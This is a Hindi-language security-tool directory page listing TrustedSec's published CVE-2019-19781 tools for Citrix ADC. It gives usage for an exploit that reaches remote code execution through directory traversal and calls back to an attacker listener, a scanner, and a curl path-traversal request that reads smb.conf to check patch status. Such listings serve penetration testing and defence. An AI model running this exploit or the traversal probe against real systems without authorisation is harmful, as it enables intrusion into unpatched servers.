Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2019-19781 — यह Citrix ADC (NetScaler) भेद्यता के लिए प्रकाशित एक उपकरण है। हम इसे केवल इसलिए प्रकट कर रहे हैं क्योंकि अन्य लोगों ने पहले एक्सप्लॉइट कोड प्रकाशित किया है। | Kitploit
उपकरण/GitHubGitHub/trustedsec/cve-2019-19781
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubtrustedsec/cve-2019-19781

cve-2019-19781

यह Citrix ADC (NetScaler) भेद्यता के लिए प्रकाशित एक उपकरण है। हम इसे केवल इसलिए प्रकट कर रहे हैं क्योंकि अन्य लोगों ने पहले एक्सप्लॉइट कोड प्रकाशित किया है।

रिपॉजिटरी देखें
5731256 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-19781

इसे केवल इसलिए अपलोड किया गया क्योंकि अन्य शोधकर्ताओं ने अपना कोड पहले प्रकाशित कर दिया था। हम आशा करते थे कि इसे कुछ समय और छिपाकर रखा जा सकता, जब तक कि डिफेंडरों को अपने सिस्टम को पैच करने का उचित समय न मिल जाता।

हम जिम्मेदार प्रकटीकरण के पक्ष में हैं, इस मामले में - बिल्ली पहले ही थैले से बाहर निकल चुकी थी।

एक्सप्लॉइट्स: CVE-2019-19781

Citrixmash (CVE-2019-19781 एक्सप्लॉइट)

root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# python citrixmash.py

Citrixmash v0.1 - एक्सप्लॉइट्स द सिट्रिक्स डायरेक्टरी ट्रैवर्सल बग: CVE-2019-19781 टूल रॉब साइमन और डेव कैनेडी द्वारा लिखा गया योगदान: द TrustedSec टीम वेबसाइट: https://www.trustedsec.com INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ फोरेंसिक्स और IOCS: https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/

यह टूल Citrix ADC (NetScalers) के भीतर एक डायरेक्टरी ट्रैवर्सल बग का फायदा उठाता है, जो एक perl स्क्रिप्ट को कॉल करता है जिसका उपयोग पीड़ित मशीन पर फाइलों को XML प्रारूप में जोड़ने के लिए किया जाता है। यह बदले में रिमोट कोड एक्ज़ीक्यूशन की अनुमति देता है।

इन दो फाइल स्थानों को साफ करना सुनिश्चित करें: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/

ध्यान दें कि victimaddress और attackerip_listener फ़ील्ड में DNS होस्टनाम और IP पते समर्थित हैं।

उपयोग:

python citrixmash.py <attackerip_listener> <attacker_port>

usage: citrixmash.py [-h] target targetport attackerip attackerport

CVE-2019-19781 स्कैनर

यह जाँचने के लिए एक सरल परीक्षण है कि क्या सर्वर अभी भी CVE-2019-19781 के प्रति संवेदनशील है।

उपयोग: python3 cve-2019-19781.py

ध्यान दें कि आप CIDR नोटेशन जैसे 192.168.1.1/24 और होस्टनाम का भी उपयोग कर सकते हैं।

यह परिणाम देगा कि सर्वर अभी भी संवेदनशील है या नहीं। आप एक बार में केवल एक सर्वर स्कैन कर सकते हैं।

CVE-2019-19781-Scanner कंपनी: TrustedSec डेव कैनेडी द्वारा लिखित यह देखेगा कि क्या रिमोट सिस्टम अभी भी CVE-2019-19781 के प्रति संवेदनशील है। यह एक बार में केवल एक होस्ट को स्कैन करेगा। आप CIDR नोटेशन का भी उपयोग कर सकते हैं, उदाहरण के लिए: 192.168.1.1/24 आप IP पतों के बजाय होस्टनाम का भी उपयोग कर सकते हैं। आप किसी बाहरी टूल द्वारा उत्पन्न IP पतों वाली फ़ाइल का भी उपयोग कर सकते हैं।

उदाहरण: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 उदाहरण2: python3 cve-2019-19781_scanner.py 192.168.1.1 443 उदाहरण3: python3 cve-2019-19781_scanner.py fakewebsiteaddress.com 443 उदाहरण4: python3 cve-2019-19781_scanner.py as15169 443 उदाहरण5: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 verbose उदाहरण6: python3 cve-2019-19781_scanner.py file:hostfile 443

उपयोग: python3 cve-2019-19781_scanner.py targetip targetport

usage: cve-2019-19781_scanner.py [-h] target targetport [verbose]

पैच को मैन्युअल रूप से सत्यापित करें

यदि आप यह परीक्षण करना चाहते हैं कि यह जोखिम कम हुआ है या नहीं, तो निम्न का उपयोग करें:

curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is

या यदि आप गैर-सार्वजनिक या आंतरिक एंटरप्राइज़ CA का उपयोग कर रहे हैं, तो आप --insecure विकल्प का उपयोग करके इसे ओवरराइड कर सकते हैं

curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure

या तो 403 का मतलब है कि आप पैच किए गए हैं या यदि यह एक Citrix वेबसाइट लौटाता है न कि स्वयं smb.conf फ़ाइल।

यदि आप smb.conf देख सकते हैं, तो आप संवेदनशील हैं।

स्थापना

आवश्यकताओं को स्थापित करने के लिए, आपको नीचे दिए गए कमांड को चलाना होगा।

pip3 install -r requirements.txt

टूल डाउनलोड करें